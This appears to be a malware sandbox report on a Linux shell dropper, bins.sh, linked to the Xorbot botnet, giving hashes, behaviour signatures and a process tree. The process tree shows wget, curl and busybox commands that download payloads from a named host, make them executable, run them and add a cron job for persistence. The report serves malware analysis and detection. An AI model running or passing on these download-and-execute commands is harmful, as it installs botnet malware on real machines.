Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
149s -
max time network
161s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
27/02/2025, 17:11
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
bins.sh
-
Size
10KB
-
MD5
0aec7763cd1e0b0ff0816e8a61703e14
-
SHA1
34d8cc1b3dde4180fc98bb42337526cd285596f7
-
SHA256
3ee572774d84f42ca24f2f7e1d041f6c54a2b1595c83ba591c6f60af4f5095cb
-
SHA512
5f0b46c702a374991819ff3d43141d24ad4b6bdbf112848d05cff833a9e37ed2e0f10dd9705e1da911c169a617fbd504806c616a73337888e4a54ee1366ff0b7
-
SSDEEP
96:YaS+FFFlFcMLLnRL049GDLrHZcUlnBRn7NY8F7XsL3nL4qPjOxLwsOtJb3li6PQ0:lhaOGib0xCruW
Malware Config
Signatures
-
resource yara_rule behavioral2/files/fstream-1.dat family_xorbot -
Xorbot family
-
Contacts a large (1792) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 2 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 758 chmod 768 chmod -
Executes dropped EXE 2 IoCs
ioc pid Process /tmp/PqJSRmQESXaCxjKaH4rwrQqE0jxQgjhmZH 759 bins.sh /tmp/PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd 769 bins.sh -
Renames itself 1 IoCs
pid Process 770 PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd -
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
description ioc Process File opened for modification /var/spool/cron/crontabs/tmp.AYgFvU crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
Checks CPU configuration 1 TTPs 2 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/846/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/944/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/165/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/22/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/292/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/600/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/889/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/filesystems crontab File opened for reading /proc/16/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/133/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/647/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/800/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/801/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/4/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/590/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/905/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/914/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/5/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/107/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/134/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/841/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/874/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/74/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/872/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/930/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/7/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/24/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/267/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/806/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/819/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/838/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/851/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/894/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/28/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/814/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/892/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/23/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/27/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/818/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/880/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/902/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/2/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/15/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/805/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/857/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/871/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/941/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/943/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/14/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/26/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/817/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/861/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/883/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/20/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/796/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/828/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/829/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/830/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/8/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/filesystems crontab File opened for reading /proc/581/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/41/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/649/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/909/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd -
System Network Configuration Discovery 1 TTPs 7 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 753 busybox 762 wget 765 curl 767 busybox 779 wget 658 wget 720 curl -
Writes file to tmp directory 5 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/PqJSRmQESXaCxjKaH4rwrQqE0jxQgjhmZH wget File opened for modification /tmp/PqJSRmQESXaCxjKaH4rwrQqE0jxQgjhmZH curl File opened for modification /tmp/PqJSRmQESXaCxjKaH4rwrQqE0jxQgjhmZH busybox File opened for modification /tmp/PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd wget File opened for modification /tmp/PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd curl
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵
- Executes dropped EXE
PID:650 -
/bin/rm/bin/rm bins.sh2⤵PID:652
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/PqJSRmQESXaCxjKaH4rwrQqE0jxQgjhmZH2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:658
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/PqJSRmQESXaCxjKaH4rwrQqE0jxQgjhmZH2⤵
- Checks CPU configuration
- System Network Configuration Discovery
- Writes file to tmp directory
PID:720
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/PqJSRmQESXaCxjKaH4rwrQqE0jxQgjhmZH2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:753
-
-
/bin/chmodchmod 777 PqJSRmQESXaCxjKaH4rwrQqE0jxQgjhmZH2⤵
- File and Directory Permissions Modification
PID:758
-
-
/tmp/PqJSRmQESXaCxjKaH4rwrQqE0jxQgjhmZH./PqJSRmQESXaCxjKaH4rwrQqE0jxQgjhmZH2⤵PID:759
-
-
/bin/rmrm PqJSRmQESXaCxjKaH4rwrQqE0jxQgjhmZH2⤵PID:761
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:762
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd2⤵
- Checks CPU configuration
- System Network Configuration Discovery
- Writes file to tmp directory
PID:765
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd2⤵
- System Network Configuration Discovery
PID:767
-
-
/bin/chmodchmod 777 PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd2⤵
- File and Directory Permissions Modification
PID:768
-
-
/tmp/PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd./PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd2⤵
- Renames itself
- Reads runtime system information
PID:769 -
/bin/shsh -c "crontab -l"3⤵PID:771
-
/usr/bin/crontabcrontab -l4⤵
- Reads runtime system information
PID:772
-
-
-
/bin/shsh -c "crontab -"3⤵PID:773
-
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
- Reads runtime system information
PID:774
-
-
-
-
/bin/rmrm PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd2⤵PID:776
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Pms3WTDY7UrDojH8BdAAd4auYwS3NfuF2G2⤵
- System Network Configuration Discovery
PID:779
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
177KB
MD5786d75a158fe731feca3880f436082c0
SHA179ea2734e43d00cdeabed5586b2c1994d02aef3e
SHA2565fb5b9beb44997a6d1baf950a8bf05b94aa59406d82ba2fea27eb13c497d4b18
SHA5127984ebc874563267570f828ee158e4860971e184900e3590ac3b4829285443e065dd1ad4df190ceabf575880a4cd8ead4dd1132e9c1650239accf3f6440a3f7f
-
Filesize
98KB
MD55141342d0df8699fa32a6b066a0c592e
SHA18157673225bd5182f16215e2aa823a25ca2d4fbc
SHA25654302d130cd356fb19ea5a763c5ab6b0892fc234118f10ba3196ec4245c83b4d
SHA512d6b24571e7691227abafc70133a1da007c97c2730c820de77a750d2c140a8a75554cc614b4729debc4ec5480124252737c5846a458a5146005285c6d3f9e3801
-
Filesize
210B
MD540b5cd85670ce6e237d162949f723e7a
SHA1c58d70c98735cd0cbf2a4171bd4dc003e5af2f38
SHA256516f5544af172b988d4775d9f9b8d5f63f8947d5fd2ec350fd87c10fdc69a059
SHA512856b2f51564e7e712023c30876f80dfbec337cad1dc2bb15323bfd4615077f3a8222ee85827a49e84604cf5eb3ddbaccd7e70142e97a0a5650d6d2152780e6f2